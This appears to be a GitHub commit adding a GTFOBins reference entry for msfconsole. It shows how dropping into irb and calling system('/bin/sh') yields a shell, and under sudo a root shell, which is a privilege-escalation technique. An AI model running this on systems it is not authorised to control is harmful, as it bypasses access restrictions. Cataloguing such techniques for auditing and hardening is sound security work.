Add msfconsole

This commit is contained in:
Andrea Cardaci
2022-12-16 14:48:10 +01:00
committed by GitHub

14
_gtfobins/msfconsole.md Normal file
View File

@@ -0,0 +1,14 @@
---
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
functions:
shell:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/sh")
sudo:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/sh")
---